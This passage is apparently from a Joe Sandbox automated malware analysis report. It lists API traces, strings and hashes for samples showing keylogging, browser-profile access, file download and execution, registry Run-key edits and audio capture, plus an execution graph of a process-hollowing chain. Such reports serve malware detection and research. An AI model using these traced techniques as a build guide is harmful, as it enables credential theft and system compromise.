                                                                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                                                                                                                Strings
                                                                                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LocalTime
                                                                                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                • API String ID: 481472006-1507639952
                                                                                                                                                • Opcode ID: 145f269d181a8435875c36411829170d0c63d951855ea4e88e6edb1186bb4574
                                                                                                                                                • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                                                                                                                • Opcode Fuzzy Hash: 145f269d181a8435875c36411829170d0c63d951855ea4e88e6edb1186bb4574
                                                                                                                                                • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
APIs
• Sleep.KERNEL32 ref: 0041667B
• URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: DownloadFileSleep
• String ID: !D@
• API String ID: 1931167962-604454484
APIs
• PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: ExistsFilePath
• String ID: alarm.wav$hYG
• API String ID: 1174141254-2782910960
APIs
  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• CloseHandle.KERNEL32(?), ref: 0040B0EF
• UnhookWindowsHookEx.USER32 ref: 0040B102
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
• String ID: Online Keylogger Stopped
• API String ID: 1623830855-1496645233
APIs
• LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,A4E85006,00000001,?,0043CEA5), ref: 00448CA4
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: String
• String ID: LCMapStringEx$PkGNG
• API String ID: 2568140703-1065776982
APIs
• waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
• waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: wave$BufferHeaderPrepare
• String ID: XMG
• API String ID: 2315374483-813777761
APIs
• IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: LocaleValid
• String ID: IsValidLocaleName$kKD
• API String ID: 1901932003-3269126172
APIs
• PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: ExistsFilePath
• String ID: UserProfile$\AppData\Local\Google\Chrome\
• API String ID: 1174141254-4188645398
APIs
• PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: ExistsFilePath
• String ID: UserProfile$\AppData\Local\Microsoft\Edge\
• API String ID: 1174141254-2800177040
APIs
• PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: ExistsFilePath
• String ID: AppData$\Opera Software\Opera Stable\
• API String ID: 1174141254-1629609700
APIs
• GetKeyState.USER32(00000011), ref: 0040B686
  • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
  • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
  • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
  • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
  • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
  • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
  • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
• String ID: [AltL]$[AltR]
• API String ID: 2738857842-2658077756
                                                                                                                                                APIs
                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Time$FileSystem
                                                                                                                                                • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                                                                                                                                                • API String ID: 2086374402-949981407
                                                                                                                                                • Opcode ID: b67c042d7bc2b84d65cb935a06f544084891d6a740928cef279651ffc9d800ce
                                                                                                                                                • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                                                                                                                                • Opcode Fuzzy Hash: b67c042d7bc2b84d65cb935a06f544084891d6a740928cef279651ffc9d800ce
                                                                                                                                                • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                                                                                                                                APIs
                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExecuteShell
                                                                                                                                                • String ID: !D@$open
                                                                                                                                                • API String ID: 587946157-1586967515
                                                                                                                                                • Opcode ID: 30a1d241cab23d886832e5a2cf84020a5ff996eade7e739dca91f4d882a6cfc9
                                                                                                                                                • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                                                                                                • Opcode Fuzzy Hash: 30a1d241cab23d886832e5a2cf84020a5ff996eade7e739dca91f4d882a6cfc9
                                                                                                                                                • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                                                                                                APIs
                                                                                                                                                • ___initconout.LIBCMT ref: 004555DB
                                                                                                                                                  • Part of subcall function 00456B9D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004555E0,00000000,PkGNG,0044B61D,?,FF8BC35D,00000000,?,00000000), ref: 00456BB0
                                                                                                                                                • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B61D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB99,?), ref: 004555FE
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ConsoleCreateFileWrite___initconout
                                                                                                                                                • String ID: PkGNG
                                                                                                                                                • API String ID: 3087715906-263838557
                                                                                                                                                • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                                                                                                                                • Instruction ID: 53f4b2898eb153bde3bf118a85e4039abf363423ff24ad7888d91dc13aa78fd6
                                                                                                                                                • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                                                                                                                                • Instruction Fuzzy Hash: C5E0EDB0100548BBDA208B69DC29EBA3328EB00331F500369FE29C62D2EB34EC44C769
                                                                                                                                                APIs
                                                                                                                                                • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: State
                                                                                                                                                • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                • API String ID: 1649606143-2446555240
                                                                                                                                                • Opcode ID: 1321bbb6cc8174ef42da852326f734558715e41d50b56193fb2d1a3bfc871e5f
                                                                                                                                                • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                                                                                                • Opcode Fuzzy Hash: 1321bbb6cc8174ef42da852326f734558715e41d50b56193fb2d1a3bfc871e5f
                                                                                                                                                • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Init_thread_footer__onexit
                                                                                                                                                • String ID: ,kG$0kG
                                                                                                                                                • API String ID: 1881088180-2015055088
                                                                                                                                                • Opcode ID: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                                                                                                                • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                                                                                                                • Opcode Fuzzy Hash: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                                                                                                                • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                                                                                                                APIs
                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D509,00000000,?,00000000), ref: 00413A6C
                                                                                                                                                • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A80
                                                                                                                                                Strings
                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DeleteOpenValue
                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                • API String ID: 2654517830-1051519024
                                                                                                                                                • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                                                • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                                                                                                                • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                                                • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                                                                                                                APIs
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                                                                                                                • GetLastError.KERNEL32 ref: 00440D85
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1717984340-0
                                                                                                                                                • Opcode ID: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                                                                                                                                • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                                                                                                                • Opcode Fuzzy Hash: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                                                                                                                                • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                                                                                                                APIs
                                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                                                                                                                • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411CB5
                                                                                                                                                • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLastRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4100373531-0
                                                                                                                                                • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                                                                • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                                                                                                                • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                                                                • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

Execution Graph

Execution Coverage: 11.6%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 178
Total number of Limit Nodes: 9
execution_graph 34874 d0d710 DuplicateHandle 34875 d0d7a6 34874->34875 34880 d0d0c0 34881 d0d106 GetCurrentProcess 34880->34881 34883 d0d151 34881->34883 34884 d0d158 GetCurrentThread 34881->34884 34883->34884 34885 d0d195 GetCurrentProcess 34884->34885 34886 d0d18e 34884->34886 34887 d0d1cb 34885->34887 34886->34885 34888 d0d1f3 GetCurrentThreadId 34887->34888 34889 d0d224 34888->34889 34901 d0ad30 34904 d0ae28 34901->34904 34902 d0ad3f 34905 d0ae39 34904->34905 34906 d0ae5c 34904->34906 34905->34906 34907 d0b060 GetModuleHandleW 34905->34907 34906->34902 34908 d0b08d 34907->34908 34908->34902 34876 6c47bc0 34877 6c47c03 34876->34877 34878 6c47c21 MonitorFromPoint 34877->34878 34879 6c47c52 34877->34879 34878->34879 34909 6dd807b 34910 6dd8081 34909->34910 34915 6dd9a09 34910->34915 34932 6dd9a76 34910->34932 34950 6dd9a18 34910->34950 34911 6dd808c 34916 6dd9a18 34915->34916 34917 6dd9a56 34916->34917 34967 6dda1dd 34916->34967 34971 6dda4a3 34916->34971 34976 6dda083 34916->34976 34981 6dd9e67 34916->34981 34985 6dda0e5 34916->34985 34990 6dd9f05 34916->34990 34995 6dda025 34916->34995 35000 6dda50a 34916->35000 35005 6dda00b 34916->35005 35010 6dda6ef 34916->35010 35015 6dd9fd0 34916->35015 35020 6dd9f9a 34916->35020 35024 6dda4bb 34916->35024 35028 6dda379 34916->35028 34917->34911 34933 6dd9a04 34932->34933 34935 6dd9a79 34932->34935 34934 6dd9a06 34933->34934 34936 6dda1dd 2 API calls 34933->34936 34937 6dda379 2 API calls 34933->34937 34938 6dda4bb 2 API calls 34933->34938 34939 6dd9f9a 2 API calls 34933->34939 34940 6dd9fd0 2 API calls 34933->34940 34941 6dda6ef 2 API calls 34933->34941 34942 6dda00b 2 API calls 34933->34942 34943 6dda50a 2 API calls 34933->34943 34944 6dda025 2 API calls 34933->34944 34945 6dd9f05 2 API calls 34933->34945 34946 6dda0e5 2 API calls 34933->34946 34947 6dd9e67 2 API calls 34933->34947 34948 6dda083 2 API calls 34933->34948 34949 6dda4a3 2 API calls 34933->34949 34934->34911 34935->34911 34936->34934 34937->34934 34938->34934 34939->34934 34940->34934 34941->34934 34942->34934 34943->34934 34944->34934 34945->34934 34946->34934 34947->34934 34948->34934 34949->34934 34951 6dd9a32 34950->34951 34952 6dd9a56 34951->34952 34953 6dda1dd 2 API calls 34951->34953 34954 6dda379 2 API calls 34951->34954 34955 6dda4bb 2 API calls 34951->34955 34956 6dd9f9a 2 API calls 34951->34956 34957 6dd9fd0 2 API calls 34951->34957 34958 6dda6ef 2 API calls 34951->34958 34959 6dda00b 2 API calls 34951->34959 34960 6dda50a 2 API calls 34951->34960 34961 6dda025 2 API calls 34951->34961 34962 6dd9f05 2 API calls 34951->34962 34963 6dda0e5 2 API calls 34951->34963 34964 6dd9e67 2 API calls 34951->34964 34965 6dda083 2 API calls 34951->34965 34966 6dda4a3 2 API calls 34951->34966 34952->34911 34953->34952 34954->34952 34955->34952 34956->34952 34957->34952 34958->34952 34959->34952 34960->34952 34961->34952 34962->34952 34963->34952 34964->34952 34965->34952 34966->34952 35035 6dd7199 34967->35035 35039 6dd71a0 34967->35039 34968 6dda201 34972 6dda37d 34971->34972 34972->34971 34973 6dda4b7 34972->34973 35043 6dd7008 34972->35043 35047 6dd7001 34972->35047 34977 6dda03c 34976->34977 34978 6dda05d 34977->34978 34979 6dd7199 WriteProcessMemory 34977->34979 34980 6dd71a0 WriteProcessMemory 34977->34980 34978->34917 34979->34978 34980->34978 35051 6dd7859 34981->35051 35055 6dd7860 34981->35055 34986 6dda0eb 34985->34986 35059 6dd6f58 34986->35059 35063 6dd6f51 34986->35063 34987 6dda118 34987->34917 34991 6dd9f1a 34990->34991 34992 6dd9ecd 34991->34992 34993 6dd6f58 ResumeThread 34991->34993 34994 6dd6f51 ResumeThread 34991->34994 34992->34917 34993->34992 34994->34992 34996 6dda02b 34995->34996 34998 6dd7199 WriteProcessMemory 34996->34998 34999 6dd71a0 WriteProcessMemory 34996->34999 34997 6dda05d 34997->34917 34998->34997 34999->34997 35003 6dd7199 WriteProcessMemory 35000->35003 35004 6dd71a0 WriteProcessMemory 35000->35004 35001 6dda23d 35001->35000 35002 6dda64d 35001->35002 35002->34917 35003->35001 35004->35001 35006 6dda011 35005->35006 35067 6dd7288 35006->35067 35071 6dd7290 35006->35071 35007 6dda718 35011 6dda6f5 35010->35011 35012 6dda718 35011->35012 35013 6dd7288 ReadProcessMemory 35011->35013 35014 6dd7290 ReadProcessMemory 35011->35014 35013->35012 35014->35012 35016 6dd9fdd 35015->35016 35018 6dd7288 ReadProcessMemory 35016->35018 35019 6dd7290 ReadProcessMemory 35016->35019 35017 6dda718 35018->35017 35019->35017 35075 6dd70d9 35020->35075 35079 6dd70e0 35020->35079 35021 6dd9fbb 35026 6dd7008 Wow64SetThreadContext 35024->35026 35027 6dd7001 Wow64SetThreadContext 35024->35027 35025 6dda4d5 35026->35025 35027->35025 35029 6dda37d 35028->35029 35033 6dd7008 Wow64SetThreadContext 35028->35033 35034 6dd7001 Wow64SetThreadContext 35028->35034 35030 6dda4b7 35029->35030 35031 6dd7008 Wow64SetThreadContext 35029->35031 35032 6dd7001 Wow64SetThreadContext 35029->35032 35031->35029 35032->35029 35033->35029 35034->35029 35036 6dd71a0 WriteProcessMemory 35035->35036 35038 6dd723f 35036->35038 35038->34968 35040 6dd71e8 WriteProcessMemory 35039->35040 35042 6dd723f 35040->35042 35042->34968 35044 6dd704d Wow64SetThreadContext 35043->35044 35046 6dd7095 35044->35046 35046->34972 35048 6dd7008 Wow64SetThreadContext 35047->35048 35050 6dd7095 35048->35050 35050->34972 35052 6dd7860 CreateProcessA 35051->35052 35054 6dd7aab 35052->35054 35054->35054 35056 6dd78e9 CreateProcessA 35055->35056 35058 6dd7aab 35056->35058 35058->35058 35060 6dd6f98 ResumeThread 35059->35060 35062 6dd6fc9 35060->35062 35062->34987 35064 6dd6f58 ResumeThread 35063->35064 35066 6dd6fc9 35064->35066 35066->34987 35068 6dd7290 ReadProcessMemory 35067->35068 35070 6dd731f 35068->35070 35070->35007 35072 6dd72db ReadProcessMemory 35071->35072 35074 6dd731f 35072->35074 35074->35007 35076 6dd70e0 VirtualAllocEx 35075->35076 35078 6dd715d 35076->35078 35078->35021 35080 6dd7120 VirtualAllocEx 35079->35080 35082 6dd715d 35080->35082 35082->35021 35083 d04668 35084 d0467a 35083->35084 35085 d04686 35084->35085 35087 d04779 35084->35087 35088 d0477c 35087->35088 35092 d04888 35088->35092 35096 d04878 35088->35096 35094 d048af 35092->35094 35093 d0498c 35093->35093 35094->35093 35100 d044b0 35094->35100 35097 d0487c 35096->35097 35098 d0498c 35097->35098 35099 d044b0 CreateActCtxA 35097->35099 35098->35098 35099->35098 35101 d05918 CreateActCtxA 35100->35101 35103 d059db 35101->35103 34890 6c43f98 34891 6c43fe6 DrawTextExW 34890->34891 34893 6c4403e 34891->34893 34894 6ddac40 34895 6ddadcb 34894->34895 34897 6ddac66 34894->34897 34897->34895 34898 6dd5470 34897->34898 34899 6ddaec0 PostMessageW 34898->34899 34900 6ddaf2c 34899->34900 34900->34897

Control-flow Graph: function blocks d0d0b1-d0d28d (rendered graph residue; node list omitted, API calls listed below)
APIs
• GetCurrentProcess.KERNEL32 ref: 00D0D13E
• GetCurrentThread.KERNEL32 ref: 00D0D17B
• GetCurrentProcess.KERNEL32 ref: 00D0D1B8
• GetCurrentThreadId.KERNEL32 ref: 00D0D211
Memory Dump Source
• Source File: 0000000A.00000002.2036586408.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_d00000_DGlxtFUfY.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 7fcfe88d6afa215f3fd074126bef6be482aa88aaf0325547bc894a4d30f00774
• Instruction ID: 8180f06b74eeffd3c72f80d4890e0062fc7cd515402272b3524ed03d7c5b04eb
• Opcode Fuzzy Hash: 7fcfe88d6afa215f3fd074126bef6be482aa88aaf0325547bc894a4d30f00774
• Instruction Fuzzy Hash: 7C5145B0900309DFDB14CFA9D548BDEBBF1AF48314F24C46AE419A73A0DB749984CB66

Control-flow Graph: function blocks d0d0c0-d0d28d (rendered graph residue; node list omitted, API calls listed below)
APIs
• GetCurrentProcess.KERNEL32 ref: 00D0D13E
• GetCurrentThread.KERNEL32 ref: 00D0D17B
• GetCurrentProcess.KERNEL32 ref: 00D0D1B8
• GetCurrentThreadId.KERNEL32 ref: 00D0D211
Memory Dump Source
• Source File: 0000000A.00000002.2036586408.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_d00000_DGlxtFUfY.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 616519ff370f3e9ebb5f2157f89b65304f4a49d3896008c9120e3cd08e85b91d
• Instruction ID: 594e04292d47af4884a601ce5858eb50e2ffaa26db9ea77f060fa44548c61b8d
• Opcode Fuzzy Hash: 616519ff370f3e9ebb5f2157f89b65304f4a49d3896008c9120e3cd08e85b91d
• Instruction Fuzzy Hash: C15116B09003099FDB14DFAAD548B9EBBF1AB48314F24845AE419A73A0DB749984CB65

Control-flow Graph: function blocks 6dd7859-6dd7ba5 (rendered graph residue; node list omitted, API calls listed below)
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06DD7A96
Memory Dump Source
• Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 24232fcf87e39b462190832860abd24f5cd789c55d2259664d08a11229b97fa1
• Instruction ID: 9ab5f849481545d2d74f0c79496e7b2b701a451fa5ddfba9623410abc0783cc8
• Opcode Fuzzy Hash: 24232fcf87e39b462190832860abd24f5cd789c55d2259664d08a11229b97fa1
• Instruction Fuzzy Hash: 8BA17E71D00219DFDB60DFA8C841BDDBBB2FF48314F1485AAE848A7290DB749985CF91

Control-flow Graph: function blocks 6dd7860-6dd7ba5 (rendered graph residue; node list omitted, API calls listed below)
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06DD7A96
Memory Dump Source
• Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 4b5bd88ae943ac426c40efd92a8789d7e1434094c1aef686df0682b3389397b5
• Instruction ID: 7126d2c7ee1efdbb5edd7ecaaf5212c467bf5b14c8e8902f36439a7fc7a90112
• Opcode Fuzzy Hash: 4b5bd88ae943ac426c40efd92a8789d7e1434094c1aef686df0682b3389397b5
